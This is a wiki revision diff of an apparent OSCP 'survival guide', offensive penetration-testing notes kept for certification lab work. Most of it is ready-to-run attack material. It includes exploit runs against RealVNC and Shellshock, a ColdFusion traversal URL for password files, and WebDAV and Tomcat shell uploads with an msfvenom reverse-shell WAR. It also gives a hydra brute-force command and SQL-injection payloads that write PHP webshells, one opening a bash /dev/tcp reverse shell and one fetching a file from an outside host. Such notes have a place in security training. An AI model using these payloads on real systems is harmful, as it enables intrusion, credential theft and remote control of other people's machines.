This page shows the differences between the selected revision and the current version of the page.
oscp_survival_guide [2020/11/25 14:16]
oscp_survival_guide [2020/11/25 14:39] (current version)
Line 2754: Line 2754:
 https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
 +RealVNC : https://www.exploit-db.com/exploits/36932
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444
 +root@kali:~/PWK$python RealVNC-exploit-36932.py
 +[] Please input an IP address to pwn:
 +[] Hello From Server: RFB 003.008
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
 +XAMPP cred(wampp/xampp)
 +ColdFusion (Vulnerable)
 +Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
 +LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 +(either – neo-security.xml and password.properties)
 +ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 +exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln
 +auxiliary : webdav_test
 +1 cadaver http://10.11.x.x/webdav/
 +Uploading shells.txt to `shells.txt’
 +1 dav:> put shells.txt
 +2 dav:> copy shells.txt shells.asp;.txt
 +db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 +You can also bruteforce by sh hydra -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg.
 +You can upload reverse shell on manager consor ; msfvenom jsp or war file
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war
 +jar -xvf shell.war
 +Windows IIS 
 +Getting Windows 0S and version details through Nikto / Nmap Scanning.
 +nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 -p 3306
 +MySQL login : sh mysql -h -D wordpress -u root -p plbkac
 +MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/ 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
 +' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
 +' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 +root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost= lhost= lport=1234
 +[!] Started reverse shell handler
 +[-] Trying exploit on : /cgi-bin/status"
 +proxy scanner/http/squid_pivot_scanning
 +RHOST : Target
 +RANGE : Target
 +RPORT : Squid port
 +msf auxiliary(scanner/http/squid_pivot_scanning) > run
 +[+] [] is alive but 21 is CLOSED
 +[+] [] seems OPEN
 +if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 +nikto -h -useproxy"
 +RFI(Remote File Inclusion) 
 +Uploading malicious .php file on database 
 </code> </code>
oscp_survival_guide.txt · Last modified: 2020/11/25 14:39 by M0N5T3R